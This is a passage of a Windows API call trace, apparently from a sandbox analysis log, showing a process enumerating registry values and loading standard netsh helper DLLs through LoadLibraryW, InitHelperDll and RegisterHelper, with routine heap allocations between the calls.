HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a6ba0 | out: hHeap=0x270000) returned 1 [0150.958] LoadLibraryW (lpLibFileName="IFMON.DLL") returned 0x7fef3390000 [0153.926] GetProcAddress (hModule=0x7fef3390000, lpProcName="InitHelperDll") returned 0x7fef3391924 [0153.926] InitHelperDll () returned 0x0 [0153.926] RegisterHelper () returned 0x0 [0153.926] GetProcessHeap () returned 0x270000 [0153.926] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x630) returned 0x2b0ab0 [0153.926] GetProcessHeap () returned 0x270000 [0153.926] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2aecd0 | out: hHeap=0x270000) returned 1 [0153.926] RegEnumValueW (in: hKey=0x90, dwIndex=0x8, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="netiohlp", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0153.927] _wcsicmp (_String1="netiohlp.dll", _String2="ipxmontr.dll") returned 5 [0153.927] _wcsicmp (_String1="netiohlp.dll", _String2="ipxpromn.dll") returned 5 [0153.927] GetProcessHeap () returned 0x270000 [0153.927] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x190) returned 0x2ab3c0 [0153.927] GetProcessHeap () returned 0x270000 [0153.927] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x12) returned 0x2ae290 [0153.927] GetProcessHeap () returned 0x270000 [0153.927] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1a) returned 0x2af970 [0153.927] _wcsupr (in: _String="netiohlp.dll" | out: _String="NETIOHLP.DLL") returned="NETIOHLP.DLL" [0153.927] GetProcessHeap () returned 0x270000 [0153.927] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a7140 | out: hHeap=0x270000) returned 1 [0153.927] LoadLibraryW (lpLibFileName="NETIOHLP.DLL") returned 0x7fef3100000 [0156.303] GetProcAddress (hModule=0x7fef3100000, lpProcName="InitHelperDll") returned 0x7fef311ce30 [0156.303] InitHelperDll () returned 0x0 [0156.303] RegisterHelper () returned 0x0 [0156.303] GetProcessHeap () returned 0x270000 [0156.303] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x688) returned 0x2b10f0 [0156.303] GetProcessHeap () returned 0x270000 [0156.303] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b0ab0 | out: hHeap=0x270000) returned 1 [0156.303] RegisterHelper () returned 0x0 [0156.303] GetProcessHeap () returned 0x270000 [0156.303] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x6e0) returned 0x2b1780 [0156.303] GetProcessHeap () returned 0x270000 [0156.303] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b10f0 | out: hHeap=0x270000) returned 1 [0156.303] RegisterHelper () returned 0x0 [0156.303] GetProcessHeap () returned 0x270000 [0156.303] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x738) returned 0x2b0ab0 [0156.303] GetProcessHeap () returned 0x270000 [0156.303] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b1780 | out: hHeap=0x270000) returned 1 [0156.303] RegisterHelper () returned 0x0 [0156.303] GetProcessHeap () returned 0x270000 [0156.303] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x790) returned 0x2b11f0 [0156.303] GetProcessHeap () returned 0x270000 [0156.303] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b0ab0 | out: hHeap=0x270000) returned 1 [0156.303] RegisterHelper () returned 0x0 [0156.303] GetProcessHeap () returned 0x270000 [0156.303] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x7e8) returned 0x2b1990 [0156.304] GetProcessHeap () returned 0x270000 [0156.304] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b11f0 | out: hHeap=0x270000) returned 1 [0156.304] RegisterHelper () returned 0x0 [0156.304] GetProcessHeap () returned 0x270000 [0156.304] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x840) returned 0x2b2180 [0156.304] GetProcessHeap () returned 0x270000 [0156.304] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b1990 | out: hHeap=0x270000) returned 1 [0156.304] RegisterHelper () returned 0x0 [0156.304] GetProcessHeap () returned 0x270000 [0156.304] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x898) returned 0x2b0ab0 [0156.304] GetProcessHeap () returned 0x270000 [0156.304] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b2180 | out: hHeap=0x270000) returned 1 [0156.304] RegisterHelper () returned 0x0 [0156.304] GetProcessHeap () returned 0x270000 [0156.304] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x8f0) returned 0x2b1350 [0156.304] GetProcessHeap () returned 0x270000 [0156.304] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b0ab0 | out: hHeap=0x270000) returned 1 [0156.304] RegisterHelper () returned 0x0 [0156.304] GetProcessHeap () returned 0x270000 [0156.304] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x948) returned 0x2b1c50 [0156.304] GetProcessHeap () returned 0x270000 [0156.304] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b1350 | out: hHeap=0x270000) returned 1 [0156.304] RegEnumValueW (in: hKey=0x90, dwIndex=0x9, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="whhelper", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0156.304] _wcsicmp (_String1="whhelper.dll", _String2="ipxmontr.dll") returned 14 [0156.304] _wcsicmp (_String1="whhelper.dll", _String2="ipxpromn.dll") returned 14 [0156.304] GetProcessHeap () returned 0x270000 [0156.304] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1b8) returned 0x2ab560 [0156.304] GetProcessHeap () returned 0x270000 [0156.305] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x12) returned 0x2ae2d0 [0156.305] GetProcessHeap () returned 0x270000 [0156.305] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1a) returned 0x2aead0 [0156.305] _wcsupr (in: _String="whhelper.dll" | out: _String="WHHELPER.DLL") returned="WHHELPER.DLL" [0156.305] GetProcessHeap () returned 0x270000 [0156.305] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ab3c0 | out: hHeap=0x270000) returned 1 [0156.305] LoadLibraryW (lpLibFileName="WHHELPER.DLL") returned 0x7fef86c0000 [0158.264] GetProcAddress (hModule=0x7fef86c0000, lpProcName="InitHelperDll") returned 0x7fef86c210c [0158.264] InitHelperDll () returned 0x0 [0158.265] RegisterHelper () returned 0x0 [0158.265] GetProcessHeap () returned 0x270000 [0158.265] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x9a0) returned 0x2b25a0 [0158.265] GetProcessHeap () returned 0x270000 [0158.265] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b1c50 | out: hHeap=0x270000) returned 1 [0158.265] RegEnumValueW (in: hKey=0x90, dwIndex=0xa, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="hnetmon", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0158.265] _wcsicmp (_String1="hnetmon.dll", _String2="ipxmontr.dll") returned -1 [0158.265] _wcsicmp (_String1="hnetmon.dll", _String2="ipxpromn.dll") returned -1 [0158.265] GetProcessHeap () returned 0x270000 [0158.265] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1e0) returned 0x2aef40 [0158.265] GetProcessHeap () returned 0x270000 [0158.265] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2ae2f0 [0158.265] GetProcessHeap () returned 0x270000 [0158.265] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2ae310 [0158.265] _wcsupr (in: _String="hnetmon.dll" | out: _String="HNETMON.DLL") returned="HNETMON.DLL" [0158.265] GetProcessHeap () returned 0x270000 [0158.265] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ab560 | out: hHeap=0x270000) returned 1 [0158.265] LoadLibraryW (lpLibFileName="HNETMON.DLL") returned 0x7fef86b0000 [0159.785] GetProcAddress (hModule=0x7fef86b0000, lpProcName="InitHelperDll") returned 0x7fef86b22a4 [0159.808] InitHelperDll () returned 0x0 [0159.808] RegisterHelper () returned 0x0 [0159.808] GetProcessHeap () returned 0x270000 [0159.808] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x9f8) returned 0x2b2f50 [0159.809] GetProcessHeap () returned 0x270000 [0159.809] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b25a0 | out: hHeap=0x270000) returned 1 [0159.809] RegEnumValueW (in: hKey=0x90, dwIndex=0xb, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="rpc", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0159.809] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxmontr.dll") returned 9 [0159.809] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxpromn.dll") returned 9 [0159.809] GetProcessHeap () returned 0x270000 [0159.809] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x208) returned 0x2b3950 [0159.809] GetProcessHeap () returned 0x270000 [0159.809] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x8) returned 0x2ab6f0 [0159.809] GetProcessHeap () returned 0x270000 [0159.809] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x16) returned 0x2ae390 [0159.809] _wcsupr (in: _String="rpcnsh.dll" | out: _String="RPCNSH.DLL") returned="RPCNSH.DLL" [0159.809] GetProcessHeap () returned 0x270000 [0159.809] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2aef40 | out: hHeap=0x270000) returned 1 [0159.809] LoadLibraryW (lpLibFileName="RPCNSH.DLL") returned 0x7fef4d60000 [0160.600] GetProcAddress (hModule=0x7fef4d60000, lpProcName="InitHelperDll") returned 0x7fef4d62e88 [0160.600] InitHelperDll () returned 0x0 [0160.600] RegisterHelper () returned 0x0 [0160.600] GetProcessHeap () returned 0x270000 [0160.600] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xa50) returned 0x2b22b0 [0160.600] GetProcessHeap () returned 0x270000 [0160.600] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b2f50 | out: hHeap=0x270000) returned 1 [0160.600] RegisterHelper () returned 0x0 [0160.600] GetProcessHeap () returned 0x270000 [0160.600] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xaa8) returned 0x2b2d10 [0160.600] GetProcessHeap () returned 0x270000 [0160.600] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b22b0 | out: hHeap=0x270000) returned 1 [0160.601] RegEnumValueW (in: hKey=0x90, dwIndex=0xc, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="dot3cfg", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0160.601] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxmontr.dll") returned -5 [0160.601] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxpromn.dll") returned -5 [0160.601] GetProcessHeap () returned 0x270000 [0160.601] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x230) returned 0x2aef40 [0160.601] GetProcessHeap () returned 0x270000 [0160.601] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2ae3b0 [0160.601] GetProcessHeap () returned 0x270000 [0160.601] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2ae3d0 [0160.601] _wcsupr (in: _String="dot3cfg.dll" | out: _String="DOT3CFG.DLL") returned="DOT3CFG.DLL" [0160.601] GetProcessHeap () returned 0x270000 [0160.601] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b3950 | out: hHeap=0x270000) returned 1 [0160.601] LoadLibraryW (lpLibFileName="DOT3CFG.DLL") returned 0x7fef4d40000 [0163.589] GetProcAddress (hModule=0x7fef4d40000, lpProcName="InitHelperDll") returned 0x7fef4d4390c [0163.589] InitHelperDll () returned 0x0 [0163.589] RegisterHelper () returned 0x0 [0163.589] GetProcessHeap () returned 0x270000 [0163.589] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xb00) returned 0x2b4fd0 [0163.590] GetProcessHeap () returned 0x270000 [0163.590] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b2d10 | out: hHeap=0x270000) returned 1 [0163.590] RegEnumValueW (in: hKey=0x90, dwIndex=0xd, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="napmontr", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0163.590] _wcsicmp (_String1="napmontr.dll", _String2="ipxmontr.dll") returned 5 [0163.590] _wcsicmp (_String1="napmontr.dll", _String2="ipxpromn.dll") returned 5 [0163.590] GetProcessHeap () returned 0x270000 [0163.590] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x258) returned 0x2b5ae0 [0163.590] GetProcessHeap () returned 0x270000 [0163.590] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x12) returned 0x2ae470 [0163.590] GetProcessHeap () returned 0x270000 [0163.590] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1a) returned 0x2b3be0 [0163.590] _wcsupr (in: _String="napmontr.dll" | out: _String="NAPMONTR.DLL") returned="NAPMONTR.DLL" [0163.590] GetProcessHeap () returned 0x270000 [0163.590] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2aef40 | out: hHeap=0x270000) returned 1 [0163.590] LoadLibraryW (lpLibFileName="NAPMONTR.DLL") returned 0x7fef4c30000 [0167.866] GetProcAddress (hModule=0x7fef4c30000, lpProcName="InitHelperDll") returned 0x7fef4c4048c [0167.866] InitHelperDll () returned 0x0 [0167.866] RegisterHelper () returned 0x0 [0167.866] GetProcessHeap () returned 0x270000 [0167.866] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xb58) returned 0x2b5fd0 [0167.867] GetProcessHeap () returned 0x270000 [0167.867] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b4fd0 | out: hHeap=0x270000) returned 1 [0167.867] RegisterHelper () returned 0x0 [0167.867] GetProcessHeap () returned 0x270000 [0167.867] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xbb0) returned 0x2b6b30 [0167.867] GetProcessHeap () returned 0x270000 [0167.867] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b5fd0 | out: hHeap=0x270000) returned 1 [0167.867] RegisterHelper () returned 0x0 [0167.867] GetProcessHeap () returned 0x270000 [0167.867] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xc08) returned 0x2b76f0 [0167.868] GetProcessHeap () returned 0x270000 [0167.868] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b6b30 | out: hHeap=0x270000) returned 1 [0167.868] RegEnumValueW (in: hKey=0x90, dwIndex=0xe, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="nshipsec", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0167.868] _wcsicmp (_String1="nshipsec.dll", _String2="ipxmontr.dll") returned 5 [0167.868] _wcsicmp (_String1="nshipsec.dll", _String2="ipxpromn.dll") returned 5 [0167.868] GetProcessHeap () returned 0x270000 [0167.868] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x280) returned 0x2b2ec0 [0167.868] GetProcessHeap () returned 0x270000 [0167.868] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x12) returned 0x2ae530 [0167.868] GetProcessHeap () returned 0x270000 [0167.868] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1a) returned 0x2b2ab0 [0167.868] _wcsupr (in: _String="nshipsec.dll" | out: _String="NSHIPSEC.DLL") returned="NSHIPSEC.DLL" [0167.868] GetProcessHeap () returned 0x270000 [0167.868] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b5ae0 | out: hHeap=0x270000) returned 1 [0167.869] LoadLibraryW (lpLibFileName="NSHIPSEC.DLL") returned 0x7fef3000000 [0174.299] GetProcAddress (hModule=0x7fef3000000, lpProcName="InitHelperDll") returned 0x7fef3006230 [0174.299] InitHelperDll () returned 0x0 [0174.299] RegisterHelper () returned 0x0 [0174.299] GetProcessHeap () returned 0x270000 [0174.299] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xc60) returned 0x2bcd30 [0174.300] GetProcessHeap () returned 0x270000 [0174.300] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b76f0 | out: hHeap=0x270000) returned 1 [0174.300] RegisterHelper () returned 0x0 [0174.300] GetProcessHeap () returned 0x270000 [0174.300] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xcb8) returned 0x2b6fd0 [0174.300] GetProcessHeap () returned 0x270000 [0174.300] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bcd30 | out: hHeap=0x270000) returned 1 [0174.300] RegisterHelper () returned 0x0 [0174.300] GetProcessHeap () returned 0x270000 [0174.300] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xd10) returned 0x2bcd30 [0174.300] GetProcessHeap () returned 0x270000 [0174.300] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b6fd0 | out: hHeap=0x270000) returned 1 [0174.490] RegEnumValueW (in: hKey=0x90, dwIndex=0xf, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="nettrace", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0174.490] _wcsicmp (_String1="nettrace.dll", _String2="ipxmontr.dll") returned 5 [0174.490] _wcsicmp (_String1="nettrace.dll", _String2="ipxpromn.dll") returned 5 [0174.490] GetProcessHeap () returned 0x270000 [0174.490] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x2a8) returned 0x2b6fd0 [0174.490] GetProcessHeap () returned 0x270000 [0174.490] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x12) returned 0x2ae710 [0174.490] GetProcessHeap () returned 0x270000 [0174.490] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1a) returned 0x2b5510 [0174.490] _wcsupr (in: _String="nettrace.dll" | out: _String="NETTRACE.DLL") returned="NETTRACE.DLL" [0174.490] GetProcessHeap () returned 0x270000 [0174.490] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b2ec0 | out: hHeap=0x270000) returned 1 [0174.490] LoadLibraryW (lpLibFileName="NETTRACE.DLL") returned 0x7fef2bc0000 [0177.364] GetProcAddress (hModule=0x7fef2bc0000, lpProcName="InitHelperDll") returned 0x7fef2c07360 [0177.364] InitHelperDll () returned 0x0 [0177.364] RegisterHelper () returned 0x0 [0177.364] GetProcessHeap () returned 0x270000 [0177.364] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xd68) returned 0x2c2610 [0177.364] GetProcessHeap () returned 0x270000 [0177.364] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bcd30 | out: hHeap=0x270000) returned 1 [0177.365] RegEnumValueW (in: hKey=0x90, dwIndex=0x10, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="WcnNetsh", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0177.365] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxmontr.dll") returned 14 [0177.365] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxpromn.dll") returned 14 [0177.365] GetProcessHeap () returned 0x270000 [0177.365] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x2d0) returned 0x2c3380 [0177.365] GetProcessHeap () returned 0x270000 [0177.365] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x12) returned 0x2ae610 [0177.365] GetProcessHeap () returned 0x270000 [0177.365] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1a) returned 0x2c2310 [0177.365] _wcsupr (in: _String="WcnNetsh.dll" | out: _String="WCNNETSH.DLL") returned="WCNNETSH.DLL" [0177.365] GetProcessHeap () returned 0x270000 [0177.365] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b6fd0 | out: hHeap=0x270000) returned 1 [0177.365] LoadLibraryW (lpLibFileName="WCNNETSH.DLL") returned 0x7fef2990000 [0179.515] GetProcAddress (hModule=0x7fef2990000, lpProcName="InitHelperDll") returned 0x7fef29928e4 [0179.515] InitHelperDll () returned 0x0 [0179.515] RegisterHelper () returned 0x0 [0179.516] GetProcessHeap () returned 0x270000 [0179.516] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xdc0) returned 0x2c4e60 [0179.516] GetProcessHeap () returned 0x270000 [0179.516] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2c2610 | out: hHeap=0x270000) returned 1 [0179.516] RegEnumValueW (in: hKey=0x90, dwIndex=0x11, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="p2pnetsh", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0179.516] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxmontr.dll") returned 7 [0179.516] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxpromn.dll") returned 7 [0179.516] GetProcessHeap () returned 0x270000 [0179.516] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x2f8) returned 0x2b6fd0 [0179.516] GetProcessHeap () returned 0x270000 [0179.517] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x12) returned 0x2ae630 [0179.517] GetProcessHeap () returned 0x270000 [0179.517] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1a) returned 0x2c3960 [0179.517] _wcsupr (in: _String="p2pnetsh.dll" | out: _String="P2PNETSH.DLL") returned="P2PNETSH.DLL" [0179.517] GetProcessHeap () returned 0x270000 [0179.517] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2c3380 | out: hHeap=0x270000) returned 1 [0179.517] LoadLibraryW (lpLibFileName="P2PNETSH.DLL") returned 0x7fef2960000 [0189.143] GetProcAddress (hModule=0x7fef2960000, lpProcName="InitHelperDll") returned 0x7fef2965568 [0189.143] InitHelperDll () returned 0x0 [0189.143] RegisterHelper () returned 0x0 [0189.143] GetProcessHeap () returned 0x270000 [0189.143] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xe18) returned 0x2cae50 [0189.143] GetProcessHeap () returned 0x270000 [0189.143] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2c4e60 | out: hHeap=0x270000) returned 1 [0189.143] RegisterHelper () returned 0x0 [0189.143] GetProcessHeap () returned 0x270000 [0189.143] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xe70) returned 0x2cbc70 [0189.144] GetProcessHeap () returned 0x270000 [0189.144] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cae50 | out: hHeap=0x270000) returned 1 [0189.144] RegisterHelper () returned 0x0 [0189.144] GetProcessHeap () returned 0x270000 [0189.144] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xec8) returned 0x2ccaf0 [0189.144] GetProcessHeap () returned 0x270000 [0189.144] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cbc70 | out: hHeap=0x270000) returned 1 [0189.144] RegisterHelper () returned 0x0 [0189.144] GetProcessHeap () returned 0x270000 [0189.144] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xf20) returned 0x2cae50 [0189.144] GetProcessHeap () returned 0x270000 [0189.144] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ccaf0 | out: hHeap=0x270000) returned 1 [0189.144] RegisterHelper () returned 0x0 [0189.144] GetProcessHeap () returned 0x270000 [0189.144] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xf78) returned 0x2cbd80 [0189.145] GetProcessHeap () returned 0x270000 [0189.145] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cae50 | out: hHeap=0x270000) returned 1 [0189.145] RegisterHelper () returned 0x0 [0189.145] GetProcessHeap () returned 0x270000 [0189.145] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xfd0) returned 0x2ccd00 [0189.145] GetProcessHeap () returned 0x270000 [0189.145] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cbd80 | out: hHeap=0x270000) returned 1 [0189.145] RegisterHelper () returned 0x0 [0189.145] GetProcessHeap () returned 0x270000 [0189.145] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1028) returned 0x2cae50 [0189.145] GetProcessHeap () returned 0x270000 [0189.145] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ccd00 | out: hHeap=0x270000) returned 1 [0189.145] RegisterHelper () returned 0x0 [0189.145] GetProcessHeap () returned 0x270000 [0189.145] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1080) returned 0x2cbe80 [0189.145] GetProcessHeap () returned 0x270000 [0189.145] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cae50 | out: hHeap=0x270000) returned 1 [0189.146] RegisterHelper () returned 0x0 [0189.146] GetProcessHeap () returned 0x270000 [0189.146] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10d8) returned 0x2ccf10 [0189.146] GetProcessHeap () returned 0x270000 [0189.146] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cbe80 | out: hHeap=0x270000) returned 1 [0189.146] RegisterHelper () returned 0x0 [0189.146] GetProcessHeap () returned 0x270000 [0189.146] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1130) returned 0x2cdff0 [0189.146] GetProcessHeap () returned 0x270000 [0189.146] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ccf10 | out: hHeap=0x270000) returned 1 [0189.146] RegEnumValueW (in: hKey=0x90, dwIndex=0x12, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="wwancfg", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0189.147] _wcsicmp (_String1="wwancfg.dll", _String2="ipxmontr.dll") returned 14 [0189.147] _wcsicmp (_String1="wwancfg.dll", _String2="ipxpromn.dll") returned 14 [0189.147] GetProcessHeap () returned 0x270000 [0189.147] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x320) returned 0x2bd140 [0189.147] GetProcessHeap () returned 0x270000 [0189.147] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2ae690 [0189.147] GetProcessHeap () returned 0x270000 [0189.147] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2ae670 [0189.147] _wcsupr (in: _String="wwancfg.dll" | out: _String="WWANCFG.DLL") returned="WWANCFG.DLL" [0189.147] GetProcessHeap () returned 0x270000 [0189.147] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2b6fd0 | out: hHeap=0x270000) returned 1 [0189.147] LoadLibraryW (lpLibFileName="WWANCFG.DLL") returned 0x7fef2830000 [0189.917] GetProcAddress (hModule=0x7fef2830000, lpProcName="InitHelperDll") returned 0x7fef28320c8 [0189.917] InitHelperDll () returned 0x0 [0189.917] RegisterHelper () returned 0x0 [0189.917] GetProcessHeap () returned 0x270000 [0189.917] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1188) returned 0x2cae50 [0189.917] GetProcessHeap () returned 0x270000 [0189.917] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cdff0 | out: hHeap=0x270000) returned 1 [0189.917] RegEnumValueW (in: hKey=0x90, 